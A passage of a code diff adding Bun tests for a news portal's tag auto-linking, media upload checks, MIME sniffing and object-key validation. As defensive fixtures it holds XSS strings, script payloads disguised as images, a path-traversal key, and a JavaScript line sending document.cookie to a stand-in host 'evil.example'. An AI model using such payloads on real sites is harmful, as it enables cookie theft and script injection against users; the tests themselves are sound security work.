+      expect(result.value.disabledTagIds).toEqual([VALID_UUID]);
+    }
+  });
+
+  test("rejects a disabledTagIds entry that is not a UUID", () => {
+    const result = validateUpdateInternalTagLinkingSettingsInput({
+      disabledTagIds: ["not-a-uuid"]
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects a non-array disabledTagIds", () => {
+    const result = validateUpdateInternalTagLinkingSettingsInput({
+      disabledTagIds: VALID_UUID
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an oversized disabledTagIds array", () => {
+    const tooMany = Array.from({ length: 501 }, () => VALID_UUID);
+    const result = validateUpdateInternalTagLinkingSettingsInput({
+      disabledTagIds: tooMany
+    });
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("isValidUuid", () => {
+  test("accepts a well-formed UUID", () => {
+    expect(isValidUuid(VALID_UUID)).toBe(true);
+  });
+
+  test("rejects a malformed value", () => {
+    expect(isValidUuid("not-a-uuid")).toBe(false);
+    expect(isValidUuid(123)).toBe(false);
+    expect(isValidUuid(undefined)).toBe(false);
+  });
+});

--- a/tests/internal-tag-linking.test.ts
+++ b/tests/internal-tag-linking.test.ts
@@ -1,0 +1,407 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  applyInternalTagLinksToHtml,
+  createInternalTagLinkEngine,
+  type InternalTagLinkCandidate,
+  type InternalTagLinkingPolicy
+} from "../src/modules/blog-content/domain/internal-tag-linking";
+
+const BASE_POLICY: InternalTagLinkingPolicy = {
+  enabled: true,
+  maxPerPost: 10,
+  maxPerTag: 1,
+  minTermLength: 3,
+  linkFirstOccurrenceOnly: true,
+  excludeHeadings: true,
+  caseInsensitive: false
+};
+
+function candidate(
+  tagId: string,
+  name: string,
+  url: string
+): InternalTagLinkCandidate {
+  return { tagId, name, url };
+}
+
+describe("applyInternalTagLinksToHtml (Issue #641)", () => {
+  test("exact match links a matching term to its tag archive URL", async () => {
+    const html = "<p>This article is about Jakarta today.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+
+    expect(result.html).toContain(
+      '<a href="/news/tag/jakarta" class="auto-internal-link" data-tag-id="t1" rel="tag">Jakarta</a>'
+    );
+    expect(result.matches).toEqual([
+      {
+        tagId: "t1",
+        tagName: "Jakarta",
+        url: "/news/tag/jakarta",
+        matchedText: "Jakarta"
+      }
+    ]);
+  });
+
+  test("exact match (case-sensitive default) does NOT link a different-case occurrence", async () => {
+    const html = "<p>jakarta is a city.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+
+    expect(result.html).toBe(html);
+    expect(result.matches).toHaveLength(0);
+  });
+
+  test("case-insensitive matching links regardless of case, preserving the original matched casing", async () => {
+    const html = "<p>jakarta is a city. JAKARTA is busy.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      {
+        ...BASE_POLICY,
+        caseInsensitive: true,
+        linkFirstOccurrenceOnly: false,
+        maxPerTag: 5
+      }
+    );
+
+    expect(result.html).toContain(">jakarta</a>");
+    expect(result.html).toContain(">JAKARTA</a>");
+    expect(result.matches).toHaveLength(2);
+  });
+
+  test("Indonesian word boundary: a tag is not linked as a substring of a larger word sharing the same root", async () => {
+    const html = "<p>Saya suka memakan makanan enak. Ayo makan bersama.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "makan", "/news/tag/makan")],
+      BASE_POLICY
+    );
+
+    // "memakan" and "makanan" must NOT be linked -- only the standalone
+    // occurrence of "makan" qualifies.
+    expect(result.html).not.toContain(">memakan</a>");
+    expect(result.html).not.toContain(">makanan</a>");
+    expect(result.html).toContain(
+      '<a href="/news/tag/makan" class="auto-internal-link" data-tag-id="t1" rel="tag">makan</a>'
+    );
+    expect(result.matches).toHaveLength(1);
+    expect(result.matches[0]?.matchedText).toBe("makan");
+  });
+
+  test("Indonesian word boundary: a hyphenated compound still matches its own boundary-delimited occurrence", async () => {
+    const html = "<p>Kata-kata itu penting. Kata itu indah.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Kata", "/news/tag/kata")],
+      { ...BASE_POLICY, linkFirstOccurrenceOnly: true }
+    );
+
+    // Only the first eligible occurrence is linked (maxPerTag effectively 1).
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("duplicate prevention: maxPerTag caps links to the same tag within one post", async () => {
+    const html =
+      "<p>Berita pertama. Berita kedua. Berita ketiga. Berita keempat.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Berita", "/news/tag/berita")],
+      { ...BASE_POLICY, linkFirstOccurrenceOnly: false, maxPerTag: 2 }
+    );
+
+    expect(result.matches).toHaveLength(2);
+  });
+
+  test("linkFirstOccurrenceOnly caps a tag to exactly one link even when maxPerTag is higher", async () => {
+    const html = "<p>Berita pertama. Berita kedua. Berita ketiga.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Berita", "/news/tag/berita")],
+      { ...BASE_POLICY, linkFirstOccurrenceOnly: true, maxPerTag: 5 }
+    );
+
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("maxPerPost caps the total number of links across all tags", async () => {
+    const html = "<p>Politik dan Ekonomi dan Politik dan Ekonomi.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [
+        candidate("t1", "Politik", "/news/tag/politik"),
+        candidate("t2", "Ekonomi", "/news/tag/ekonomi")
+      ],
+      {
+        ...BASE_POLICY,
+        linkFirstOccurrenceOnly: false,
+        maxPerTag: 5,
+        maxPerPost: 1
+      }
+    );
+
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("longest match wins when one tag name is a prefix of another", async () => {
+    const html = "<p>Warga Jakarta Selatan dan warga Jakarta lainnya.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [
+        candidate("t1", "Jakarta", "/news/tag/jakarta"),
+        candidate("t2", "Jakarta Selatan", "/news/tag/jakarta-selatan")
+      ],
+      { ...BASE_POLICY, linkFirstOccurrenceOnly: false }
+    );
+
+    expect(result.html).toContain(
+      '<a href="/news/tag/jakarta-selatan" class="auto-internal-link" data-tag-id="t2" rel="tag">Jakarta Selatan</a>'
+    );
+    expect(result.html).toContain(
+      '<a href="/news/tag/jakarta" class="auto-internal-link" data-tag-id="t1" rel="tag">Jakarta</a>'
+    );
+    expect(result.matches).toHaveLength(2);
+  });
+
+  test("existing anchor exclusion: never inserts a link inside an existing <a> element", async () => {
+    const html =
+      '<p>Read about Jakarta <a href="/other">Jakarta history</a> here.</p>';
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      { ...BASE_POLICY, linkFirstOccurrenceOnly: false, maxPerTag: 5 }
+    );
+
+    // The pre-existing anchor's text is byte-for-byte untouched.
+    expect(result.html).toContain('<a href="/other">Jakarta history</a>');
+    // Only the OUTSIDE occurrence was linked.
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("code/pre block exclusion: never links inside <code> or <pre>", async () => {
+    const html = "<p>Jakarta <code>Jakarta</code> <pre>Jakarta</pre> end.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      { ...BASE_POLICY, linkFirstOccurrenceOnly: false, maxPerTag: 5 }
+    );
+
+    expect(result.html).toContain("<code>Jakarta</code>");
+    expect(result.html).toContain("<pre>Jakarta</pre>");
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("script/style exclusion: never links inside <script> or <style> (defense in depth)", async () => {
+    const html =
+      "<p>Jakarta</p><script>var Jakarta = 1;</script><style>.Jakarta{}</style>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+
+    expect(result.html).toContain("<script>var Jakarta = 1;</script>");
+    expect(result.html).toContain("<style>.Jakarta{}</style>");
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("figcaption exclusion: never links inside a figure caption", async () => {
+    const html =
+      '<figure><img src="/x.jpg"><figcaption>Jakarta skyline</figcaption></figure><p>Jakarta news.</p>';
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+
+    expect(result.html).toContain("<figcaption>Jakarta skyline</figcaption>");
+    expect(result.matches).toHaveLength(1);
+    expect(result.matches[0]?.matchedText).toBe("Jakarta");
+  });
+
+  test("embed exclusion: never links inside an iframe/object/embed/video/audio element", async () => {
+    const html = '<iframe title="Jakarta"></iframe><p>Jakarta news.</p>';
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+
+    expect(result.html).toContain('<iframe title="Jakarta"></iframe>');
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("heading exclusion: excludeHeadings=true skips h1-h6 text", async () => {
+    const html = "<h1>Jakarta Today</h1><p>Jakarta news.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      { ...BASE_POLICY, excludeHeadings: true }
+    );
+
+    expect(result.html).toContain("<h1>Jakarta Today</h1>");
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("heading exclusion can be disabled via policy", async () => {
+    const html = "<h1>Jakarta Today</h1>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      { ...BASE_POLICY, excludeHeadings: false }
+    );
+
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("minTermLength filters out short tag names entirely", async () => {
+    const html = "<p>AI is everywhere.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "AI", "/news/tag/ai")],
+      { ...BASE_POLICY, minTermLength: 3 }
+    );
+
+    expect(result.matches).toHaveLength(0);
+    expect(result.html).toBe(html);
+  });
+
+  test("disabled policy is a byte-for-byte no-op (no HTMLRewriter pass at all)", async () => {
+    const html = "<p>Jakarta news.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      { ...BASE_POLICY, enabled: false }
+    );
+
+    expect(result.html).toBe(html);
+    expect(result.matches).toHaveLength(0);
+  });
+
+  test("XSS safety: a tag name containing HTML-special characters matches the escaped text safely, without corrupting markup", async () => {
+    const html = "<p>Sesi Q&amp;A akan diadakan.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Q&A", "/news/tag/q-and-a")],
+      BASE_POLICY
+    );
+
+    expect(result.html).toBe(
+      '<p>Sesi <a href="/news/tag/q-and-a" class="auto-internal-link" data-tag-id="t1" rel="tag">Q&amp;A</a> akan diadakan.</p>'
+    );
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("XSS safety: a malicious tag name can never inject markup -- href/attributes are always escaped", async () => {
+    const html = '<p>Jakarta says "hello".</p>';
+    const maliciousTagId = '"><script>alert(1)</script>';
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate(maliciousTagId, "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+
+    expect(result.html).not.toContain("<script>alert(1)</script>");
+    expect(result.html).toContain('data-tag-id="&quot;&gt;&lt;script&gt;');
+  });
+
+  test("XSS safety: a malicious tag NAME (the realistic vector, not just tagId) is only ever matched in its escaped form and never introduces a real <script> tag", async () => {
+    // Tag names, unlike slugs/ids, have no character restriction at write
+    // time -- this is the actual attacker-controlled field the issue's
+    // security note is about. The article HTML the matcher receives is
+    // already-escaped (the whitelist renderer's own output), so a mention
+    // of this name in prose would already read as escaped entities.
+    const maliciousName = '"><script>alert(1)</script>';
+    const html =
+      "<p>Warning: &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; was mentioned.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", maliciousName, "/news/tag/malicious")],
+      BASE_POLICY
+    );
+
+    expect(result.html).not.toContain("<script>alert(1)</script>");
+    expect(result.html).toContain(
+      '<a href="/news/tag/malicious" class="auto-internal-link" data-tag-id="t1" rel="tag">&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;</a>'
+    );
+    expect(result.matches).toHaveLength(1);
+  });
+
+  test("XSS safety: content containing a raw <script>-like text node is never re-interpreted as markup by the matcher itself", async () => {
+    // `renderContentJsonToHtml` never emits this shape in practice (its own
+    // whitelist rejects raw HTML), but this module must not assume that --
+    // it operates on whatever HTML string it is given, always via a real
+    // parser, never a naive string replace.
+    const html =
+      "<p>&lt;script&gt;alert(1)&lt;/script&gt; mentions Jakarta.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+
+    expect(result.html).toContain("&lt;script&gt;alert(1)&lt;/script&gt;");
+    expect(result.html).toContain(
+      '<a href="/news/tag/jakarta" class="auto-internal-link" data-tag-id="t1" rel="tag">Jakarta</a>'
+    );
+  });
+
+  test("no candidates and no matching terms both produce a byte-for-byte unchanged result", async () => {
+    const html = "<p>Nothing to see here.</p>";
+    const resultNoCandidates = await applyInternalTagLinksToHtml(
+      html,
+      [],
+      BASE_POLICY
+    );
+    expect(resultNoCandidates.html).toBe(html);
+
+    const resultNoMatch = await applyInternalTagLinksToHtml(
+      html,
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      BASE_POLICY
+    );
+    expect(resultNoMatch.html).toBe(html);
+  });
+
+  test("duplicate candidate names collapse to a single deterministic match target", async () => {
+    const html = "<p>Jakarta news.</p>";
+    const result = await applyInternalTagLinksToHtml(
+      html,
+      [
+        candidate("t1", "Jakarta", "/news/tag/jakarta-1"),
+        candidate("t2", "Jakarta", "/news/tag/jakarta-2")
+      ],
+      BASE_POLICY
+    );
+
+    expect(result.matches).toHaveLength(1);
+    // Deterministic: t1 sorts first (same escaped length, alphabetical tie
+    // broken by original candidate order via Array#sort stability on name).
+    expect(result.matches[0]?.tagId).toBe("t1");
+  });
+});
+
+describe("createInternalTagLinkEngine", () => {
+  test("returns null when policy is disabled", () => {
+    const engine = createInternalTagLinkEngine(
+      [candidate("t1", "Jakarta", "/news/tag/jakarta")],
+      { ...BASE_POLICY, enabled: false }
+    );
+    expect(engine).toBeNull();
+  });
+
+  test("returns null when there are no eligible candidates", () => {
+    const engine = createInternalTagLinkEngine(
+      [candidate("t1", "AI", "/news/tag/ai")],
+      { ...BASE_POLICY, minTermLength: 5 }
+    );
+    expect(engine).toBeNull();
+  });
+});

--- a/tests/module-management-job-registry.test.ts
+++ b/tests/module-management-job-registry.test.ts
@@ -91,6 +91,7 @@ describe("fetchModuleJobs", () => {
         "bun run email:templates:seed-defaults",
         "bun run identity-access:business-scope:expiry",
         "bun run logs:audit:purge",
+        "bun run news-media:reconcile",
         "bun run reporting:exports:dispatch",
         "bun run reporting:projections:refresh",
         "bun run sync:objects:dispatch",

--- a/tests/module-management-job-registry.test.ts
+++ b/tests/module-management-job-registry.test.ts
@@ -83,6 +83,7 @@ describe("fetchModuleJobs", () => {
 
     expect(commands).toEqual(
       [
+        "bun run blog:publish:scheduled",
         "bun run config:validate",
         "bun run domain-events:dispatch",
         "bun run email:dispatch",

--- a/tests/news-media-finalize-decision.test.ts
+++ b/tests/news-media-finalize-decision.test.ts
@@ -1,0 +1,87 @@
+import { describe, expect, test } from "bun:test";
+
+import { decideNewsMediaFinalizeOutcome } from "../src/modules/news-portal/domain/news-media-finalize-decision";
+
+const ALLOWED = ["image/jpeg", "image/png", "image/webp", "image/gif"];
+
+describe("decideNewsMediaFinalizeOutcome (Issue #634)", () => {
+  test("accepts when sniffed mime matches allow-list and claimed mime, no checksum claim", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/jpeg",
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({ accepted: true });
+  });
+
+  test("accepts when checksum claim matches computed checksum (case-insensitive)", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/png",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/png",
+      claimedChecksumSha256: "ABCD".repeat(16),
+      computedChecksumSha256: "abcd".repeat(16)
+    });
+    expect(decision).toEqual({ accepted: true });
+  });
+
+  test("rejects — mime not recognized at all (HTML/JS disguised as an image, the Issue #631 exploit)", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: undefined,
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({
+      accepted: false,
+      reason: "mime_not_recognized"
+    });
+  });
+
+  test("rejects — sniffed mime recognized but not in the deployment's allow-list", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/gif",
+      allowedMimeTypes: ["image/jpeg", "image/png"],
+      sniffedMimeType: "image/gif",
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({ accepted: false, reason: "mime_not_allowed" });
+  });
+
+  test("rejects — sniffed mime does not match the claimed mime type at create time", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/png",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/jpeg",
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({ accepted: false, reason: "mime_mismatch" });
+  });
+
+  test("rejects — checksum claim does not match server-computed checksum, even though mime sniff passed", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/jpeg",
+      claimedChecksumSha256: "b".repeat(64),
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({ accepted: false, reason: "checksum_mismatch" });
+  });
+
+  test("a passing MIME sniff never overrides a checksum claim mismatch (defense in depth — every check must pass)", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/webp",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/webp",
+      claimedChecksumSha256: "deadbeef".repeat(8),
+      computedChecksumSha256: "0".repeat(64)
+    });
+    expect(decision.accepted).toBe(false);
+  });
+});

--- a/tests/news-media-mime-sniffer.test.ts
+++ b/tests/news-media-mime-sniffer.test.ts
@@ -1,0 +1,67 @@
+import { describe, expect, test } from "bun:test";
+
+import { sniffNewsMediaMimeType } from "../src/modules/news-portal/domain/news-media-mime-sniffer";
+
+function bytesOf(...values: number[]): Uint8Array {
+  return new Uint8Array(values);
+}
+
+describe("sniffNewsMediaMimeType (Issue #634)", () => {
+  test("recognizes JPEG magic bytes", () => {
+    expect(
+      sniffNewsMediaMimeType(bytesOf(0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10))
+    ).toBe("image/jpeg");
+  });
+
+  test("recognizes PNG magic bytes", () => {
+    expect(
+      sniffNewsMediaMimeType(
+        bytesOf(0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00)
+      )
+    ).toBe("image/png");
+  });
+
+  test("recognizes GIF87a and GIF89a magic bytes", () => {
+    expect(
+      sniffNewsMediaMimeType(
+        bytesOf(0x47, 0x49, 0x46, 0x38, 0x37, 0x61, 0x00, 0x00)
+      )
+    ).toBe("image/gif");
+    expect(
+      sniffNewsMediaMimeType(
+        bytesOf(0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x00, 0x00)
+      )
+    ).toBe("image/gif");
+  });
+
+  test("recognizes WebP (RIFF....WEBP) magic bytes", () => {
+    const bytes = new TextEncoder().encode("RIFF\x00\x00\x00\x00WEBPVP8 ");
+    expect(sniffNewsMediaMimeType(bytes)).toBe("image/webp");
+  });
+
+  test("returns undefined for an HTML payload disguised with a .jpg name/claimed mime type — the exact Issue #631 exploit scenario", () => {
+    const html = new TextEncoder().encode(
+      "<html><body><script>alert('xss')</script></body></html>"
+    );
+    expect(sniffNewsMediaMimeType(html)).toBeUndefined();
+  });
+
+  test("returns undefined for a JS payload", () => {
+    const js = new TextEncoder().encode(
+      "fetch('https://evil.example/steal?c=' + document.cookie)"
+    );
+    expect(sniffNewsMediaMimeType(js)).toBeUndefined();
+  });
+
+  test("returns undefined for empty/too-short input", () => {
+    expect(sniffNewsMediaMimeType(new Uint8Array())).toBeUndefined();
+    expect(sniffNewsMediaMimeType(bytesOf(0xff))).toBeUndefined();
+  });
+
+  test("returns undefined for an SVG payload (never allow-listed, doc §9)", () => {
+    const svg = new TextEncoder().encode(
+      "<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>"
+    );
+    expect(sniffNewsMediaMimeType(svg)).toBeUndefined();
+  });
+});

--- a/tests/news-media-object-key.test.ts
+++ b/tests/news-media-object-key.test.ts
@@ -1,0 +1,132 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  buildNewsMediaObjectKey,
+  buildNewsMediaPublicUrl,
+  deriveExtensionFromMimeType,
+  isValidNewsMediaObjectKey,
+  UnsupportedNewsMediaMimeTypeError,
+  UntrustedNewsMediaPublicBaseUrlError
+} from "../src/modules/news-portal/domain/news-media-object-key";
+
+const TENANT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
+const OTHER_TENANT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
+const UUID = "cccccccc-cccc-cccc-cccc-cccccccccccc";
+
+describe("deriveExtensionFromMimeType", () => {
+  test("maps every default-allowed mime type per architecture doc §6", () => {
+    expect(deriveExtensionFromMimeType("image/jpeg")).toBe("jpg");
+    expect(deriveExtensionFromMimeType("image/png")).toBe("png");
+    expect(deriveExtensionFromMimeType("image/webp")).toBe("webp");
+    expect(deriveExtensionFromMimeType("image/gif")).toBe("gif");
+  });
+
+  test("is case-insensitive and trims whitespace", () => {
+    expect(deriveExtensionFromMimeType(" IMAGE/JPEG ")).toBe("jpg");
+  });
+
+  test("returns undefined for an unmapped mime type (e.g. svg, disallowed by default)", () => {
+    expect(deriveExtensionFromMimeType("image/svg+xml")).toBeUndefined();
+    expect(deriveExtensionFromMimeType("application/pdf")).toBeUndefined();
+  });
+});
+
+describe("buildNewsMediaObjectKey", () => {
+  test("builds the exact §6 format: news-media/{tenantId}/{yyyy}/{mm}/{uuid}.{ext}", () => {
+    const key = buildNewsMediaObjectKey({
+      tenantId: TENANT_ID,
+      mimeType: "image/png",
+      uuid: UUID,
+      now: new Date("2026-03-05T00:00:00Z")
+    });
+
+    expect(key).toBe(`news-media/${TENANT_ID}/2026/03/${UUID}.png`);
+  });
+
+  test("throws UnsupportedNewsMediaMimeTypeError for an unmapped mime type", () => {
+    expect(() =>
+      buildNewsMediaObjectKey({
+        tenantId: TENANT_ID,
+        mimeType: "image/svg+xml",
+        uuid: UUID
+      })
+    ).toThrow(UnsupportedNewsMediaMimeTypeError);
+  });
+
+  test("never includes an original filename, title, or other client text", () => {
+    const key = buildNewsMediaObjectKey({
+      tenantId: TENANT_ID,
+      mimeType: "image/jpeg",
+      uuid: UUID,
+      now: new Date("2026-01-01T00:00:00Z")
+    });
+
+    // The key is fully determined by tenantId/date/uuid/ext — nothing else
+    // could sneak in even if a caller tried (no such parameter exists).
+    expect(key).toBe(`news-media/${TENANT_ID}/2026/01/${UUID}.jpg`);
+  });
+});
+
+describe("isValidNewsMediaObjectKey", () => {
+  test("accepts a well-formed key for the given tenant", () => {
+    const key = `news-media/${TENANT_ID}/2026/03/${UUID}.jpg`;
+    expect(isValidNewsMediaObjectKey(TENANT_ID, key)).toBe(true);
+  });
+
+  test("rejects a key belonging to a different tenant", () => {
+    const key = `news-media/${OTHER_TENANT_ID}/2026/03/${UUID}.jpg`;
+    expect(isValidNewsMediaObjectKey(TENANT_ID, key)).toBe(false);
+  });
+
+  test("rejects a key with a local-filesystem-looking path", () => {
+    expect(isValidNewsMediaObjectKey(TENANT_ID, "/uploads/photo.jpg")).toBe(
+      false
+    );
+    expect(isValidNewsMediaObjectKey(TENANT_ID, "/public/photo.jpg")).toBe(
+      false
+    );
+  });
+
+  test("rejects a key using the original filename instead of a uuid", () => {
+    const key = `news-media/${TENANT_ID}/2026/03/photo-lapangan.jpg`;
+    expect(isValidNewsMediaObjectKey(TENANT_ID, key)).toBe(false);
+  });
+
+  test("rejects a key with a malformed date partition", () => {
+    const key = `news-media/${TENANT_ID}/26/3/${UUID}.jpg`;
+    expect(isValidNewsMediaObjectKey(TENANT_ID, key)).toBe(false);
+  });
+
+  test("rejects path traversal attempts", () => {
+    const key = `news-media/${TENANT_ID}/../../etc/passwd`;
+    expect(isValidNewsMediaObjectKey(TENANT_ID, key)).toBe(false);
+  });
+});
+
+describe("buildNewsMediaPublicUrl", () => {
+  test("builds a URL from the trusted base URL and server-generated object key", () => {
+    const key = `news-media/${TENANT_ID}/2026/03/${UUID}.jpg`;
+    expect(buildNewsMediaPublicUrl("https://media.example.test", key)).toBe(
+      `https://media.example.test/${key}`
+    );
+  });
+
+  test("trims a trailing slash on the base URL before joining", () => {
+    const key = `news-media/${TENANT_ID}/2026/03/${UUID}.jpg`;
+    expect(buildNewsMediaPublicUrl("https://media.example.test/", key)).toBe(
+      `https://media.example.test/${key}`
+    );
+  });
+
+  test("rejects a non-https base URL", () => {
+    expect(() =>
+      buildNewsMediaPublicUrl("http://media.example.test", "k")
+    ).toThrow(UntrustedNewsMediaPublicBaseUrlError);
+  });
+
+  test("rejects a malformed base URL", () => {
+    expect(() => buildNewsMediaPublicUrl("not-a-url", "k")).toThrow(
+      UntrustedNewsMediaPublicBaseUrlError
+    );
+  });
+});

--- a/tests/news-media-permissions.test.ts
+++ b/tests/news-media-permissions.test.ts
@@ -1,0 +1,55 @@
+import { describe, expect, test } from "bun:test";
+
+import { newsPortalModule } from "../src/modules/news-portal/module";
+import {
+  NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+  NEWS_MEDIA_PERMISSIONS
+} from "../src/modules/news-portal/domain/news-media-permissions";
+
+describe("NEWS_MEDIA_PERMISSIONS", () => {
+  test("declares one key per required media lifecycle action (including cancel, added by Issue #634 for aborting a not-yet-uploaded session)", () => {
+    expect(Object.keys(NEWS_MEDIA_PERMISSIONS).sort()).toEqual(
+      [
+        "attach",
+        "cancel",
+        "create",
+        "delete",
+        "detach",
+        "purge",
+        "read",
+        "restore",
+        "verify"
+      ].sort()
+    );
+  });
+
+  test("every permission key follows the news_portal.media.<action> shape", () => {
+    for (const value of Object.values(NEWS_MEDIA_PERMISSIONS)) {
+      expect(value).toMatch(
+        new RegExp(
+          `^news_portal\\.${NEWS_MEDIA_PERMISSION_ACTIVITY_CODE}\\.[a-z]+$`
+        )
+      );
+    }
+  });
+
+  test("module.ts now declares these as real permissions (Issue #634 added the endpoints that enforce them)", () => {
+    // Previously (#633) `permissions` was deliberately left undeclared until
+    // a real endpoint existed to enforce them. Issue #634 added the
+    // presigned-upload-session endpoints (create/finalize/cancel) — see
+    // `tests/modules/news-portal-module.test.ts` for the exhaustive
+    // key-by-key match against these exact constants. Issue #637 later
+    // added TWO more permissions under a DIFFERENT activityCode
+    // (`homepage_sections`) — filtered out here since this test is
+    // specifically about the `media` activityCode's own permission count,
+    // not the module's total permission count.
+    expect(newsPortalModule.permissions).toBeDefined();
+    const mediaPermissions = newsPortalModule.permissions?.filter(
+      (permission) =>
+        permission.activityCode === NEWS_MEDIA_PERMISSION_ACTIVITY_CODE
+    );
+    expect(mediaPermissions?.length).toBe(
+      Object.keys(NEWS_MEDIA_PERMISSIONS).length
+    );
+  });
+});

--- a/tests/news-media-r2-client.test.ts
+++ b/tests/news-media-r2-client.test.ts
@@ -1,0 +1,552 @@
+/**
+ * `createNewsMediaR2Client` against a real local fake S3-compatible HTTP
+ * server (`Bun.serve`) — same convention
+ * `tests/integration/object-dispatch.integration.test.ts` already
+ * established for `Bun.S3Client` (a real client library talking to a real,
+ * if fake, HTTP endpoint is far more trustworthy than mocking the client
+ * itself). Not gated behind `DATABASE_URL` — no database involved, just an
+ * HTTP server, so this lives in `tests/unit` and always runs.
+ */
+import { afterEach, describe, expect, test } from "bun:test";
+
+import {
+  createNewsMediaR2Client,
+  readCappedStream
+} from "../src/modules/news-portal/infrastructure/news-media-r2-client";
+import { resetProviderCircuitBreakersForTests } from "../src/lib/database/circuit-breaker";
+
+afterEach(() => {
+  resetProviderCircuitBreakersForTests();
+});
+
+const BASE_CONFIG = {
+  accountId: "test-account",
+  accessKeyId: "test-key",
+  secretAccessKey: "test-secret",
+  bucket: "test-bucket"
+};
+
+describe("createNewsMediaR2Client (Issue #634)", () => {
+  test("presignUploadUrl returns a scoped, expiring URL without a network call", () => {
+    const client = createNewsMediaR2Client(BASE_CONFIG);
+    const url = client.presignUploadUrl({
+      objectKey: "news-media/tenant/2026/07/abc.jpg",
+      mimeType: "image/jpeg",
+      ttlSeconds: 300
+    });
+
+    expect(typeof url).toBe("string");
+    expect(url).toContain("news-media/tenant/2026/07/abc.jpg");
+    // Never leaks the raw secret access key into the URL string as-is —
+    // presign signs, it does not embed the secret literally.
+    expect(url).not.toContain(BASE_CONFIG.secretAccessKey);
+  });
+
